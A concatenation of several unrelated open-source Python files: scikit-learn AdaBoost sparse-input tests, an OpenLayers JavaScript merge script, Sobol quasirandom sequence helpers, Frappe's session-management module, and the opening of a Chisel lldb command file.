from sklearn.linear_model import LinearRegression
from sklearn.cluster import KMeans
clf = AdaBoostClassifier(LinearRegression(), algorithm="SAMME")
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostRegressor(LinearRegression())
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostClassifier(KMeans(), algorithm="SAMME")
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostRegressor(KMeans())
assert_raises(ValueError, clf.fit, X, y_regr)
def test_sparse_classification():
# Check classification with sparse input.
class CustomSVC(SVC):
"""SVC variant that records the nature of the training set."""
def fit(self, X, y, sample_weight=None):
"""Modification on fit caries data type for later verification."""
super(CustomSVC, self).fit(X, y, sample_weight=sample_weight)
self.data_type_ = type(X)
return self
X, y = datasets.make_multilabel_classification(n_classes=1, n_samples=15,
n_features=5,
return_indicator=True,
random_state=42)
# Flatten y to a 1d array
y = np.ravel(y)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
for sparse_format in [csc_matrix, csr_matrix, lil_matrix, coo_matrix,
dok_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
# Trained on sparse format
sparse_classifier = AdaBoostClassifier(
base_estimator=CustomSVC(probability=True),
random_state=1,
algorithm="SAMME"
).fit(X_train_sparse, y_train)
# Trained on dense format
dense_classifier = AdaBoostClassifier(
base_estimator=CustomSVC(probability=True),
random_state=1,
algorithm="SAMME"
).fit(X_train, y_train)
# predict
sparse_results = sparse_classifier.predict(X_test_sparse)
dense_results = dense_classifier.predict(X_test)
assert_array_equal(sparse_results, dense_results)
# decision_function
sparse_results = sparse_classifier.decision_function(X_test_sparse)
dense_results = dense_classifier.decision_function(X_test)
assert_array_equal(sparse_results, dense_results)
# predict_log_proba
sparse_results = sparse_classifier.predict_log_proba(X_test_sparse)
dense_results = dense_classifier.predict_log_proba(X_test)
assert_array_equal(sparse_results, dense_results)
# predict_proba
sparse_results = sparse_classifier.predict_proba(X_test_sparse)
dense_results = dense_classifier.predict_proba(X_test)
assert_array_equal(sparse_results, dense_results)
# score
sparse_results = sparse_classifier.score(X_test_sparse, y_test)
dense_results = dense_classifier.score(X_test, y_test)
assert_array_equal(sparse_results, dense_results)
# staged_decision_function
sparse_results = sparse_classifier.staged_decision_function(
X_test_sparse)
dense_results = dense_classifier.staged_decision_function(X_test)
for sprase_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sprase_res, dense_res)
# staged_predict
sparse_results = sparse_classifier.staged_predict(X_test_sparse)
dense_results = dense_classifier.staged_predict(X_test)
for sprase_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sprase_res, dense_res)
# staged_predict_proba
sparse_results = sparse_classifier.staged_predict_proba(X_test_sparse)
dense_results = dense_classifier.staged_predict_proba(X_test)
for sprase_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sprase_res, dense_res)
# staged_score
sparse_results = sparse_classifier.staged_score(X_test_sparse,
y_test)
dense_results = dense_classifier.staged_score(X_test, y_test)
for sprase_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sprase_res, dense_res)
# Verify sparsity of data is maintained during training
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([(t == csc_matrix or t == csr_matrix)
for t in types])
def test_sparse_regression():
# Check regression with sparse input.
class CustomSVR(SVR):
"""SVR variant that records the nature of the training set."""
def fit(self, X, y, sample_weight=None):
"""Modification on fit caries data type for later verification."""
super(CustomSVR, self).fit(X, y, sample_weight=sample_weight)
self.data_type_ = type(X)
return self
X, y = datasets.make_regression(n_samples=15, n_features=50, n_targets=1,
random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
for sparse_format in [csc_matrix, csr_matrix, lil_matrix, coo_matrix,
dok_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
# Trained on sparse format
sparse_classifier = AdaBoostRegressor(
base_estimator=CustomSVR(),
random_state=1
).fit(X_train_sparse, y_train)
# Trained on dense format
dense_classifier = dense_results = AdaBoostRegressor(
base_estimator=CustomSVR(),
random_state=1
).fit(X_train, y_train)
# predict
sparse_results = sparse_classifier.predict(X_test_sparse)
dense_results = dense_classifier.predict(X_test)
assert_array_equal(sparse_results, dense_results)
# staged_predict
sparse_results = sparse_classifier.staged_predict(X_test_sparse)
dense_results = dense_classifier.staged_predict(X_test)
for sprase_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sprase_res, dense_res)
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([(t == csc_matrix or t == csr_matrix)
for t in types])
|
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2013 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
from collections import OrderedDict
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires?:?\s+(\S*)\s*\n" # TODO: Ensure in comment?
class MissingImport(Exception):
"""Exception raised when a listed import is not found in the lib."""
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source, cfgExclude):
"""
"""
self.filepath = filepath
self.source = source
self.excludedFiles = []
self.requiredFiles = []
auxReq = re.findall(RE_REQUIRE, self.source)
for filename in auxReq:
if undesired(filename, cfgExclude):
self.excludedFiles.append(filename)
else:
self.requiredFiles.append(filename)
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
return self.requiredFiles
requires = property(fget=_getRequirements, doc="")
def usage(filename):
"""
Displays a usage message.
"""
print("%s [-c <config file>] <output.js> <directory> [...]" % filename)
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
exclude/this/dir
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, filename):
"""
Parses the content of the named file and stores the values.
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def undesired(filepath, excludes):
# exclude file if listed
exclude = filepath in excludes
if not exclude:
# check if directory is listed
for excludepath in excludes:
if not excludepath.endswith("/"):
excludepath += "/"
if filepath.startswith(excludepath):
exclude = True
break
return exclude
def getNames (sourceDirectory, configFile = None):
return run(sourceDirectory, None, configFile, True)
def run (sourceDirectory, outputFilename = None, configFile = None,
returnAsListOfNames = False):
cfg = None
if configFile:
cfg = Config(configFile)
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if cfg and cfg.include:
if filepath in cfg.include or filepath in cfg.forceFirst:
allFiles.append(filepath)
elif (not cfg) or (not undesired(filepath, cfg.exclude)):
allFiles.append(filepath)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = OrderedDict()
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
print("Importing: %s" % filepath)
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content, cfg.exclude) # TODO: Chop path?
print()
from toposort import toposort
complete = False
resolution_pass = 1
while not complete:
complete = True
## Resolve the dependencies
print("Resolution pass %s... " % resolution_pass)
resolution_pass += 1
for filepath, info in list(files.items()):
for path in info.requires:
if not path in files:
complete = False
fullpath = os.path.join(sourceDirectory, path).strip()
if os.path.exists(fullpath):
print("Importing: %s" % path)
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[path] = SourceFile(path, content, cfg.exclude) # TODO: Chop path?
else:
raise MissingImport("File '%s' not found (required by '%s')." % (path, filepath))
# create dictionary of dependencies
dependencies = OrderedDict()
for filepath, info in files.items():
dependencies[filepath] = info.requires
print("Sorting...")
order = toposort(dependencies) #[x for x in toposort(dependencies)]
## Move forced first and last files to the required position
if cfg:
print("Re-ordering files...")
order = cfg.forceFirst + [item
for item in order
if ((item not in cfg.forceFirst) and
(item not in cfg.forceLast))] + cfg.forceLast
print()
## Output the files in the determined order
result = []
# Return as a list of filenames
if returnAsListOfNames:
for fp in order:
fName = os.path.normpath(os.path.join(sourceDirectory, fp)).replace("\\","/")
print("Append: %s" % fName)
f = files[fp]
for fExclude in f.excludedFiles:
print(" Required file \"%s\" is excluded." % fExclude )
result.append(fName)
print("\nTotal files: %d " % len(result))
return result
# Return as merged source code
for fp in order:
f = files[fp]
print("Exporting: %s" % f.filepath)
for fExclude in f.excludedFiles:
print(" Required file \"%s\" is excluded." % fExclude )
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
print("\nTotal files merged: %d " % len(files))
if outputFilename:
print("\nGenerating: %s" % (outputFilename))
open(outputFilename, "w").write("".join(result))
return "".join(result)
if __name__ == "__main__":
import getopt
options, args = getopt.getopt(sys.argv[1:], "-c:")
try:
outputFilename = args[0]
except IndexError:
usage(sys.argv[0])
raise SystemExit
else:
sourceDirectory = args[1]
if not sourceDirectory:
usage(sys.argv[0])
raise SystemExit
configFile = None
if options and options[0][0] == "-c":
configFile = options[0][1]
print("Parsing configuration file: %s" % filename)
run( sourceDirectory, outputFilename, configFile )
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Helper functions
"""
from __future__ import print_function, division
import math
import numpy as np
__all__ = ['i4_sobol']
def i4_bit_hi1(n):
"""Returns the position of the high 1 bit base 2 in an integer.
Parameters
----------
n : int
The integer to be measured.
Should be nonnegative.
If N is nonpositive, the value will always be 0.
Returns
-------
bit : int
the number of bits base 2
Example
-------
N Binary BIT
---- -------- ----
0 0 0
1 1 1
2 10 2
3 11 2
4 100 3
5 101 3
6 110 3
7 111 3
8 1000 4
9 1001 4
10 1010 4
11 1011 4
12 1100 4
13 1101 4
14 1110 4
15 1111 4
16 10000 5
17 10001 5
1023 1111111111 10
1024 10000000000 11
1025 10000000001 11
"""
i = math.floor(n)
bit = 0
while (1):
if (i <= 0):
break
bit += 1
i = math.floor(i/2)
return bit
def i4_bit_lo0(n):
"""Returns the position of the low 0 bit base 2 in an integer.
Parameters
----------
n : int
The integer to be measured
Should be nonnegative
Returns
-------
bit : int
The position of the low 1 bit
Example
-------
N Binary BIT
---- -------- ----
0 0 1
1 1 2
2 10 1
3 11 3
4 100 1
5 101 2
6 110 1
7 111 4
8 1000 1
9 1001 2
10 1010 1
11 1011 3
12 1100 1
13 1101 2
14 1110 1
15 1111 5
16 10000 1
17 10001 2
1023 1111111111 1
1024 10000000000 1
1025 10000000001 1
"""
bit = 0
i = math.floor(n)
while (1):
bit += 1
i2 = math.floor(i/2)
if (i == 2 * i2):
break
i = i2
return bit
def i4_sobol(dim, seed):
"""Generates a new quasirandom Sobol vector with each call.
Parameters
----------
dim : int
The number of spatial dimensions
Must satisfy 1 <= dim <= 40
seed : int
Input/output, integer SEED, the "seed" for the sequence.
This is essentially the index in the sequence of the quasirandom
value to be generated. On output, SEED has been set to the
appropriate next value, usually simply SEED+1.
If SEED is less than 0 on input, it is treated as though it were 0.
An input value of 0 requests the first (0-th) element of the sequence.
Returns
-------
quasi : array
The next quasirandom vector
seed : int
The "seed" for the sequence
"""
global atmost
global dim_max
global dim_save
global initialized
global lastq
global log_max
global maxcol
global poly
global recipd
global seed_save
global v
if (not 'initialized' in globals().keys()):
initialized = 0
dim_save = -1
if (not initialized or dim != dim_save):
initialized = 1
dim_max = 40
dim_save = -1
log_max = 30
seed_save = -1
# Initialize (part of) V.
v = np.zeros((dim_max, log_max))
v[0:40, 0] = np.transpose([
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
v[2:40, 1] = np.transpose([
1, 3, 1, 3, 1, 3, 3, 1,
3, 1, 3, 1, 3, 1, 1, 3, 1, 3,
1, 3, 1, 3, 3, 1, 3, 1, 3, 1,
3, 1, 1, 3, 1, 3, 1, 3, 1, 3])
v[3:40, 2] = np.transpose([
7, 5, 1, 3, 3, 7, 5,
5, 7, 7, 1, 3, 3, 7, 5, 1, 1,
5, 3, 3, 1, 7, 5, 1, 3, 3, 7,
5, 1, 1, 5, 7, 7, 5, 1, 3, 3])
v[5:40, 3] = np.transpose([
1, 7, 9, 13, 11,
1, 3, 7, 9, 5, 13, 13, 11, 3, 15,
5, 3, 15, 7, 9, 13, 9, 1, 11, 7,
5, 15, 1, 15, 11, 5, 3, 1, 7, 9])
v[7:40, 4] = np.transpose([
9, 3, 27,
15, 29, 21, 23, 19, 11, 25, 7, 13, 17,
1, 25, 29, 3, 31, 11, 5, 23, 27, 19,
21, 5, 1, 17, 13, 7, 15, 9, 31, 9])
v[13:40, 5] = np.transpose([
37, 33, 7, 5, 11, 39, 63,
27, 17, 15, 23, 29, 3, 21, 13, 31, 25,
9, 49, 33, 19, 29, 11, 19, 27, 15, 25])
v[19:40, 6] = np.transpose([
13,
33, 115, 41, 79, 17, 29, 119, 75, 73, 105,
7, 59, 65, 21, 3, 113, 61, 89, 45, 107])
v[37:40, 7] = np.transpose([7, 23, 39])
# Set POLY.
poly = [
1, 3, 7, 11, 13, 19, 25, 37, 59, 47,
61, 55, 41, 67, 97, 91, 109, 103, 115, 131,
193, 137, 145, 143, 241, 157, 185, 167, 229, 171,
213, 191, 253, 203, 211, 239, 247, 285, 369, 299]
atmost = 2**log_max - 1
# Find the number of bits in ATMOST.
maxcol = i4_bit_hi1(atmost)
# Initialize row 1 of V.
v[0, 0:maxcol] = 1
# Things to do only if the dimension changed.
if (dim != dim_save):
dim_save = dim
# Initialize the remaining rows of V.
for i in range(2, dim+1):
# The bits of the integer POLY(I) gives the form of polynomial I.
# Find the degree of polynomial I from binary encoding.
j = poly[i-1]
m = 0
while (1):
j = math.floor(j/2)
if (j <= 0):
break
m = m + 1
# Expand this bit pattern to separate components of the logical
# array INCLUD.
j = poly[i-1]
includ = np.zeros(m)
for k in range(m, 0, -1):
j2 = math.floor(j/2)
includ[k-1] = (j != 2 * j2)
j = j2
# Calculate the remaining elements of row I as explained
# in Bratley and Fox, section 2.
for j in range(m+1, maxcol+1):
newv = v[i-1, j-m-1]
l = 1
for k in range(1, m+1):
l = 2 * l
if (includ[k-1]):
newv = np.bitwise_xor(int(newv),
int(l * v[i-1, j-k-1]))
v[i-1, j-1] = newv
# Multiply columns of V by appropriate power of 2.
l = 1
for j in range(maxcol-1, 0, -1):
l = 2 * l
v[0:dim, j-1] = v[0:dim, j-1] * l
# RECIPD is 1/(common denominator of the elements in V).
recipd = 1 / (2*l)
lastq = np.zeros(dim)
seed = int(math.floor(seed))
if (seed < 0):
seed = 0
if (seed == 0):
l = 1
lastq = np.zeros(dim)
elif (seed == seed_save + 1):
# Find the position of the right-hand zero in SEED.
l = i4_bit_lo0(seed)
elif (seed <= seed_save):
seed_save = 0
l = 1
lastq = np.zeros(dim)
for seed_temp in range(int(seed_save), int(seed)):
l = i4_bit_lo0(seed_temp)
for i in range(1, dim+1):
lastq[i-1] = np.bitwise_xor(int(lastq[i-1]), int(v[i-1, l-1]))
l = i4_bit_lo0(seed)
elif (seed_save + 1 < seed):
for seed_temp in range(int(seed_save + 1), int(seed)):
l = i4_bit_lo0(seed_temp)
for i in range(1, dim+1):
lastq[i-1] = np.bitwise_xor(int(lastq[i-1]), int(v[i-1, l-1]))
l = i4_bit_lo0(seed)
# Check that the user is not calling too many times!
if (maxcol < l):
msg = 'Too many calls!' + ('MAXCOL = %d\n' % maxcol) + ('L = %d\n' % l)
raise ValueError(msg)
# Calculate the new components of QUASI.
quasi = np.zeros(dim)
for i in range(dim):
quasi[i] = lastq[i] * recipd
lastq[i] = np.bitwise_xor(int(lastq[i]), int(v[i, l-1]))
seed_save = seed
seed = seed + 1
return [quasi, seed]
def i4_uniform(a, b, seed):
"""Returns a scaled pseudorandom I4.
Discussion:
The pseudorandom number will be scaled to be uniformly distributed
between A and B.
Parameters
----------
a : int
The minimum acceptable values
b : int
The maximum acceptable values
seed : int
Seed for the random number generator
Returns
-------
c : int
The randomly chosen integer
seed : int
The updated seed
"""
if (seed == 0):
print('I4_UNIFORM - Fatal error!')
print(' Input SEED = 0!')
seed = math.floor(seed)
a = round(a)
b = round(b)
seed = np.mod(seed, 2147483647)
if (seed < 0):
seed = seed + 2147483647
k = math.floor(seed / 127773)
seed = 16807 * (seed - k * 127773) - k * 2836
if (seed < 0):
seed = seed + 2147483647
r = seed * 4.656612875E-10
# Scale R to lie between A-0.5 and B+0.5.
r = (1.0 - r) * (min(a, b) - .5) + r * (max(a, b) + .5)
# Use rounding to convert R to an integer between A and B.
value = round(r)
value = max(value, min(a, b))
value = min(value, max(a, b))
c = value
return [int(c), int(seed)]
def prime_ge(n):
"""Returns the smallest prime greater than or equal to N.
Parameters
----------
n : int
The number to be bounded
Returns
-------
p : int
The smallest prime number that is greater than or equal to N
Example
-------
N PRIME_GE
-10 2
1 2
2 2
3 3
4 5
5 5
6 7
7 7
8 11
9 11
10 11
"""
p = max(math.ceil(n), 2)
while (not isprime(p)):
p += 1
return p
def isprime(n):
"""Returns True if N is a prime number, False otherwise.
Parameters
----------
n : int
The number to be checked
Returns
-------
bool
True or False
"""
if n != int(n) or n < 1:
return False
p = 2
while p < n:
if n % p == 0:
return False
p += 1
return True
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Boot session from cache or build
Session bootstraps info needed by common client side activities including
permission, homepage, default variables, system defaults etc
"""
import frappe, json
from frappe import _
import frappe.utils
from frappe.utils import cint, cstr
import frappe.model.meta
import frappe.defaults
import frappe.translate
from frappe.utils.change_log import get_change_log
import redis
from urllib import unquote
@frappe.whitelist()
def clear(user=None):
frappe.local.session_obj.update(force=True)
frappe.local.db.commit()
clear_cache(frappe.session.user)
clear_global_cache()
frappe.response['message'] = _("Cache Cleared")
def clear_cache(user=None):
cache = frappe.cache()
groups = ("bootinfo", "user_recent", "user_roles", "user_doc", "lang",
"defaults", "user_permissions", "roles", "home_page", "linked_with",
"desktop_icons", 'portal_menu_items')
if user:
for name in groups:
cache.hdel(name, user)
cache.delete_keys("user:" + user)
frappe.defaults.clear_cache(user)
else:
for name in groups:
cache.delete_key(name, user)
clear_global_cache()
frappe.defaults.clear_cache()
def clear_global_cache():
frappe.model.meta.clear_cache()
frappe.cache().delete_value(["app_hooks", "installed_apps",
"app_modules", "module_app", "notification_config", 'system_settings'
'scheduler_events', 'time_zone'])
frappe.setup_module_map()
def clear_sessions(user=None, keep_current=False, device=None):
if not user:
user = frappe.session.user
if not device:
device = frappe.session.data.device or "desktop"
limit = 0
if user == frappe.session.user:
simultaneous_sessions = frappe.db.get_value('User', user, 'simultaneous_sessions') or 1
limit = simultaneous_sessions - 1
condition = ''
if keep_current:
condition = ' and sid != "{0}"'.format(frappe.db.escape(frappe.session.sid))
for i, sid in enumerate(frappe.db.sql_list("""select sid from tabSessions
where user=%s and device=%s {condition}
order by lastupdate desc limit {limit}, 100""".format(condition=condition, limit=limit),
(user, device))):
delete_session(sid, reason="Logged In From Another Session")
def delete_session(sid=None, user=None, reason="Session Expired"):
from frappe.core.doctype.communication.feed import logout_feed
frappe.cache().hdel("session", sid)
frappe.cache().hdel("last_db_session_update", sid)
if sid and not user:
user_details = frappe.db.sql("""select user from tabSessions where sid=%s""", sid, as_dict=True)
if user_details: user = user_details[0].get("user")
logout_feed(user, reason)
frappe.db.sql("""delete from tabSessions where sid=%s""", sid)
frappe.db.commit()
def clear_all_sessions(reason=None):
"""This effectively logs out all users"""
frappe.only_for("Administrator")
if not reason: reason = "Deleted All Active Session"
for sid in frappe.db.sql_list("select sid from `tabSessions`"):
delete_session(sid, reason=reason)
def clear_expired_sessions():
"""This function is meant to be called from scheduler"""
for device in ("desktop", "mobile"):
for sid in frappe.db.sql_list("""select sid from tabSessions
where TIMEDIFF(NOW(), lastupdate) > TIME(%s)
and device = %s""", (get_expiry_period(device), device)):
delete_session(sid, reason="Session Expired")
def get():
"""get session boot info"""
from frappe.desk.notifications import \
get_notification_info_for_boot, get_notifications
from frappe.boot import get_bootinfo, get_unseen_notes
from frappe.limits import get_limits, get_expiry_message
bootinfo = None
if not getattr(frappe.conf,'disable_session_cache', None):
# check if cache exists
bootinfo = frappe.cache().hget("bootinfo", frappe.session.user)
if bootinfo:
bootinfo['from_cache'] = 1
bootinfo["notification_info"].update(get_notifications())
bootinfo["user"]["recent"] = json.dumps(\
frappe.cache().hget("user_recent", frappe.session.user))
if not bootinfo:
# if not create it
bootinfo = get_bootinfo()
bootinfo["notification_info"] = get_notification_info_for_boot()
frappe.cache().hset("bootinfo", frappe.session.user, bootinfo)
try:
frappe.cache().ping()
except redis.exceptions.ConnectionError:
message = _("Redis cache server not running. Please contact Administrator / Tech support")
if 'messages' in bootinfo:
bootinfo['messages'].append(message)
else:
bootinfo['messages'] = [message]
# check only when clear cache is done, and don't cache this
if frappe.local.request:
bootinfo["change_log"] = get_change_log()
bootinfo["metadata_version"] = frappe.cache().get_value("metadata_version")
if not bootinfo["metadata_version"]:
bootinfo["metadata_version"] = frappe.reset_metadata_version()
bootinfo.notes = get_unseen_notes()
for hook in frappe.get_hooks("extend_bootinfo"):
frappe.get_attr(hook)(bootinfo=bootinfo)
bootinfo["lang"] = frappe.translate.get_user_lang()
bootinfo["disable_async"] = frappe.conf.disable_async
# limits
bootinfo.limits = get_limits()
bootinfo.expiry_message = get_expiry_message()
return bootinfo
def get_csrf_token():
if not frappe.local.session.data.csrf_token:
generate_csrf_token()
return frappe.local.session.data.csrf_token
def generate_csrf_token():
frappe.local.session.data.csrf_token = frappe.generate_hash()
frappe.local.session_obj.update(force=True)
# send sid and csrf token to the user
# handles the case when a user logs in again from another tab
# and it leads to invalid request in the current tab
frappe.publish_realtime(event="csrf_generated",
message={"sid": frappe.local.session.sid, "csrf_token": frappe.local.session.data.csrf_token},
user=frappe.session.user, after_commit=True)
class Session:
def __init__(self, user, resume=False, full_name=None, user_type=None):
self.sid = cstr(frappe.form_dict.get('sid') or
unquote(frappe.request.cookies.get('sid', 'Guest')))
self.user = user
self.device = frappe.form_dict.get("device") or "desktop"
self.user_type = user_type
self.full_name = full_name
self.data = frappe._dict({'data': frappe._dict({})})
self.time_diff = None
# set local session
frappe.local.session = self.data
if resume:
self.resume()
else:
if self.user:
self.start()
def start(self):
"""start a new session"""
# generate sid
if self.user=='Guest':
sid = 'Guest'
else:
sid = frappe.generate_hash()
self.data.user = self.user
self.data.sid = sid
self.data.data.user = self.user
self.data.data.session_ip = frappe.local.request_ip
if self.user != "Guest":
self.data.data.update({
"last_updated": frappe.utils.now(),
"session_expiry": get_expiry_period(self.device),
"full_name": self.full_name,
"user_type": self.user_type,
"device": self.device,
"session_country": get_geo_ip_country(frappe.local.request_ip) if frappe.local.request_ip else None,
})
# insert session
if self.user!="Guest":
self.insert_session_record()
# update user
frappe.db.sql("""UPDATE tabUser SET last_login = %(now)s, last_ip = %(ip)s, last_active = %(now)s
where name=%(name)s""", {
"now": frappe.utils.now(),
"ip": frappe.local.request_ip,
"name": self.data['user']
})
frappe.db.commit()
def insert_session_record(self):
frappe.db.sql("""insert into tabSessions
(sessiondata, user, lastupdate, sid, status, device)
values (%s , %s, NOW(), %s, 'Active', %s)""",
(str(self.data['data']), self.data['user'], self.data['sid'], self.device))
# also add to memcache
frappe.cache().hset("session", self.data.sid, self.data)
def resume(self):
"""non-login request: load a session"""
import frappe
data = self.get_session_record()
if data:
# set language
self.data.update({'data': data, 'user':data.user, 'sid': self.sid})
self.user = data.user
self.device = data.device
else:
self.start_as_guest()
if self.sid != "Guest":
frappe.local.user_lang = frappe.translate.get_user_lang(self.data.user)
frappe.local.lang = frappe.local.user_lang
def get_session_record(self):
"""get session record, or return the standard Guest Record"""
from frappe.auth import clear_cookies
r = self.get_session_data()
if not r:
frappe.response["session_expired"] = 1
clear_cookies()
self.sid = "Guest"
r = self.get_session_data()
return r
def get_session_data(self):
if self.sid=="Guest":
return frappe._dict({"user":"Guest"})
data = self.get_session_data_from_cache()
if not data:
data = self.get_session_data_from_db()
return data
def get_session_data_from_cache(self):
data = frappe.cache().hget("session", self.sid)
if data:
data = frappe._dict(data)
session_data = data.get("data", {})
# set user for correct timezone
self.time_diff = frappe.utils.time_diff_in_seconds(frappe.utils.now(),
session_data.get("last_updated"))
expiry = self.get_expiry_in_seconds(session_data.get("session_expiry"))
if self.time_diff > expiry:
self.delete_session()
data = None
return data and data.data
def get_session_data_from_db(self):
self.device = frappe.db.get_value("Sessions", {"sid": self.sid}, "device") or 'desktop'
rec = frappe.db.sql("""select user, sessiondata
from tabSessions where sid=%s and
TIMEDIFF(NOW(), lastupdate) < TIME(%s)""", (self.sid,
get_expiry_period(self.device)))
if rec:
data = frappe._dict(eval(rec and rec[0][1] or '{}'))
data.user = rec[0][0]
else:
self.delete_session()
data = None
return data
def get_expiry_in_seconds(self, expiry):
if not expiry:
return 3600
parts = expiry.split(":")
return (cint(parts[0]) * 3600) + (cint(parts[1]) * 60) + cint(parts[2])
def delete_session(self):
delete_session(self.sid, reason="Session Expired")
def start_as_guest(self):
"""all guests share the same 'Guest' session"""
self.user = "Guest"
self.start()
def update(self, force=False):
"""extend session expiry"""
if (frappe.session['user'] == "Guest" or frappe.form_dict.cmd=="logout"):
return
now = frappe.utils.now()
self.data['data']['last_updated'] = now
self.data['data']['lang'] = unicode(frappe.lang)
# update session in db
last_updated = frappe.cache().hget("last_db_session_update", self.sid)
time_diff = frappe.utils.time_diff_in_seconds(now, last_updated) if last_updated else None
# database persistence is secondary, don't update it too often
updated_in_db = False
if force or (time_diff==None) or (time_diff > 600):
# update sessions table
frappe.db.sql("""update tabSessions set sessiondata=%s,
lastupdate=NOW() where sid=%s""" , (str(self.data['data']),
self.data['sid']))
# update last active in user table
frappe.db.sql("""update `tabUser` set last_active=%(now)s where name=%(name)s""", {
"now": frappe.utils.now(),
"name": frappe.session.user
})
frappe.db.commit()
frappe.cache().hset("last_db_session_update", self.sid, now)
updated_in_db = True
# set in memcache
frappe.cache().hset("session", self.sid, self.data)
return updated_in_db
def get_expiry_period(device="desktop"):
if device=="mobile":
key = "session_expiry_mobile"
default = "720:00:00"
else:
key = "session_expiry"
default = "06:00:00"
exp_sec = frappe.defaults.get_global_default(key) or default
# incase seconds is missing
if len(exp_sec.split(':')) == 2:
exp_sec = exp_sec + ':00'
return exp_sec
def get_geo_from_ip(ip_addr):
try:
from geoip import geolite2
return geolite2.lookup(ip_addr)
except ImportError:
return
except ValueError:
return
def get_geo_ip_country(ip_addr):
match = get_geo_from_ip(ip_addr)
if match:
return match.country
|
|
#!/usr/bin/python
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import fbchisellldbbase as fb
import fbchisellldbobjcruntimehelpers as runtimeHelpers
import fbchisellldbviewcontrollerhelpers as viewControllerHelpers
import fbchisellldbviewhelpers as viewHelpers
import lldb
def lldbcommands():
return [
FBCoreAnimationFlushCommand(),
FBDrawBorderCommand(),
FBRemoveBorderCommand(),
FBMaskViewCommand(),
FBUnmaskViewCommand(),
FBShowViewCommand(),
FBHideViewCommand(),
FBPresentViewControllerCommand(),
FBDismissViewControllerCommand(),
FBSlowAnimationCommand(),
FBUnslowAnimationCommand(),
]
class FBDrawBorderCommand(fb.FBCommand):
colors = [
"black",
"gray",
"red",
"green",
"blue",
"cyan",
"yellow",
"magenta",
"orange",
"purple",
"brown",
]
def name(self):
return "border"
def description(self):
return "Draws a border around <viewOrLayer>. Color and width can be optionally provided. Additionally depth can be provided in order to recursively border subviews."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to border. NSViews must be layer-backed.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-w",
long="--width",
arg="width",
type="CGFloat",
default=2.0,
help="Desired width of border.",
),
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to border. Each level gets a different color beginning with the provided or default color",
),
